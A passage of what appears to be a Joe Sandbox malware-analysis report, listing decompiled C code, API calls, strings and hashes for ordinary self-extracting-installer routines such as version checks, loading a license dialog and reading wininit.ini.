                                                                                                                                                                                                      • Opcode ID: 7764ce2a3261d4b862c23b4e8d35cdb89e354a402e23045cd9d3c7ffdbcbc1a8
                                                                                                                                                                                                      • Instruction ID: b1deb31b2bd0f5e4e222ec4ad7a525398e7e2dbb86f89452bee415a8d231595e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7764ce2a3261d4b862c23b4e8d35cdb89e354a402e23045cd9d3c7ffdbcbc1a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7421F875B00259AFDB109F65EC859FE7B78EB49B50B100119FA02B7241DB3A9E018BE1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E681F(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                      				void* _v172;
                                                                                                                                                                                                      				int* _v176;
                                                                                                                                                                                                      				int _v180;
                                                                                                                                                                                                      				int _v184;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t31;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                                      				intOrPtr _t41;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t36 = __ebx;
                                                                                                                                                                                                      				_t19 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                      				_t41 =  *0xe81d8; // 0x0
                                                                                                                                                                                                      				_t43 = 0;
                                                                                                                                                                                                      				_v180 = 0xc;
                                                                                                                                                                                                      				_v176 = 0;
                                                                                                                                                                                                      				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                      					 *0xe81d8 = 0;
                                                                                                                                                                                                      					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      						_t41 =  *0xe81d8; // 0x0
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t41 = 1;
                                                                                                                                                                                                      						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t31 = RegQueryValueExA(_v172, 0xe1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                      							_t43 = _t31;
                                                                                                                                                                                                      							RegCloseKey(_v172);
                                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                                      								goto L12;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t40 =  &_v176;
                                                                                                                                                                                                      								if(E000E66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                      									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                      										 *0xe81d8 = _t41;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L12;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e681f
                                                                                                                                                                                                      0x000e682a
                                                                                                                                                                                                      0x000e6831
                                                                                                                                                                                                      0x000e6836
                                                                                                                                                                                                      0x000e683c
                                                                                                                                                                                                      0x000e683e
                                                                                                                                                                                                      0x000e6848
                                                                                                                                                                                                      0x000e6851
                                                                                                                                                                                                      0x000e685d
                                                                                                                                                                                                      0x000e6864
                                                                                                                                                                                                      0x000e6876
                                                                                                                                                                                                      0x000e693a
                                                                                                                                                                                                      0x000e693a
                                                                                                                                                                                                      0x000e687c
                                                                                                                                                                                                      0x000e687e
                                                                                                                                                                                                      0x000e6885
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e68d6
                                                                                                                                                                                                      0x000e68f4
                                                                                                                                                                                                      0x000e6900
                                                                                                                                                                                                      0x000e6902
                                                                                                                                                                                                      0x000e690a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e690c
                                                                                                                                                                                                      0x000e690c
                                                                                                                                                                                                      0x000e691c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e691e
                                                                                                                                                                                                      0x000e6924
                                                                                                                                                                                                      0x000e692b
                                                                                                                                                                                                      0x000e6932
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e692b
                                                                                                                                                                                                      0x000e691c
                                                                                                                                                                                                      0x000e690a
                                                                                                                                                                                                      0x000e6885
                                                                                                                                                                                                      0x000e6876
                                                                                                                                                                                                      0x000e6951

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000E686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 000E68A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000E68CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,?,0000000C), ref: 000E68F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000E6902
                                                                                                                                                                                                        • Part of subcall function 000E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,000E691A), ref: 000E6741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 000E68C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                                                                                                      • Opcode ID: d2f3865efba2efbeba9b35da9d89e36933ce9affd41aa72397f942abe09a2a2b
                                                                                                                                                                                                      • Instruction ID: 3adf33c1a8b6ee3d31a62f83a3559069e14dfb8777d386ee2c8e1dd1ac6dfb59
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2f3865efba2efbeba9b35da9d89e36933ce9affd41aa72397f942abe09a2a2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4331B431B402989FEB30CB12EC84BAA77BCEB557A4F000195E94DBA241DB359E85CF52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E3A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E000E468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0xe8d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E000E468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0xe8d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0xe8d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E000E6517(_t19, 0x7d1, 0, E000E3100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0xe8d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe9124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0xe8d4c);
                                                                                                                                                                                                      					 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe9124 = E000E6285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x000e3a46
                                                                                                                                                                                                      0x000e3a57
                                                                                                                                                                                                      0x000e3a5d
                                                                                                                                                                                                      0x000e3a63
                                                                                                                                                                                                      0x000e3a6a
                                                                                                                                                                                                      0x000e3a91
                                                                                                                                                                                                      0x000e3a9a
                                                                                                                                                                                                      0x000e3ad8
                                                                                                                                                                                                      0x000e3b13
                                                                                                                                                                                                      0x000e3b19
                                                                                                                                                                                                      0x000e3b1b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3b21
                                                                                                                                                                                                      0x000e3ae7
                                                                                                                                                                                                      0x000e3af4
                                                                                                                                                                                                      0x000e3afc
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3afe
                                                                                                                                                                                                      0x000e3a87
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3a87
                                                                                                                                                                                                      0x000e3aa8
                                                                                                                                                                                                      0x000e3ab3
                                                                                                                                                                                                      0x000e3ab9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3ab9
                                                                                                                                                                                                      0x000e3a78
                                                                                                                                                                                                      0x000e3a82
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000E2F64,?,00000002,00000000), ref: 000E3A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 000E3AB3
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 000E3AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 000E3B13
                                                                                                                                                                                                        • Part of subcall function 000E6517: FindResourceA.KERNEL32(000E0000,000007D6,00000005), ref: 000E652A
                                                                                                                                                                                                        • Part of subcall function 000E6517: LoadResource.KERNEL32(000E0000,00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000E6538
                                                                                                                                                                                                        • Part of subcall function 000E6517: DialogBoxIndirectParamA.USER32(000E0000,00000000,00000547,000E19E0,00000000), ref: 000E6557
                                                                                                                                                                                                        • Part of subcall function 000E6517: FreeResource.KERNEL32(00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000E6560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,000E3100,00000000,00000000), ref: 000E3AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: c1da54b4f0c3ed909f08e93d06ddd50bb949761018cc080f3e24c387cb315802
                                                                                                                                                                                                      • Instruction ID: ef8fde4b6faab56ea8a2b2c3915b7ee390d029393cb92f45205a01c1e0c39c86
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1da54b4f0c3ed909f08e93d06ddd50bb949761018cc080f3e24c387cb315802
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11A5703052C1AFE7246F33AC4DE5B7EE9DBD9B50B10402EB646FE2A1DA7D88009661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E24E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E000E658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x000e24e0
                                                                                                                                                                                                      0x000e24eb
                                                                                                                                                                                                      0x000e24f2
                                                                                                                                                                                                      0x000e24f7
                                                                                                                                                                                                      0x000e2504
                                                                                                                                                                                                      0x000e250e
                                                                                                                                                                                                      0x000e251d
                                                                                                                                                                                                      0x000e252c
                                                                                                                                                                                                      0x000e2541
                                                                                                                                                                                                      0x000e2546
                                                                                                                                                                                                      0x000e2553
                                                                                                                                                                                                      0x000e2555
                                                                                                                                                                                                      0x000e2555
                                                                                                                                                                                                      0x000e2546
                                                                                                                                                                                                      0x000e256c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 000E2506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 000E252C
                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 000E253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 000E254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 000E2555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: 79ab37ec599a527b10a312a113ba4f91f6db21e0c602619e7767a241c52226be
                                                                                                                                                                                                      • Instruction ID: 04695f2b186fc08d0b3cfbecf6bf1f3c4696c876d563535e3317cd60bd32f370
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79ab37ec599a527b10a312a113ba4f91f6db21e0c602619e7767a241c52226be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3801B5327001586BD7209B669D4CEEF7BBCDB8AB60F000155FA49F7190DE789E45CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E000E36EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0xe8184 = 1;
                                                                                                                                                                                                      						 *0xe8180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0xe9a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0xe8a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E000E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E000E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe8a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0xe8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E000E681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E000E67C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E000E28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
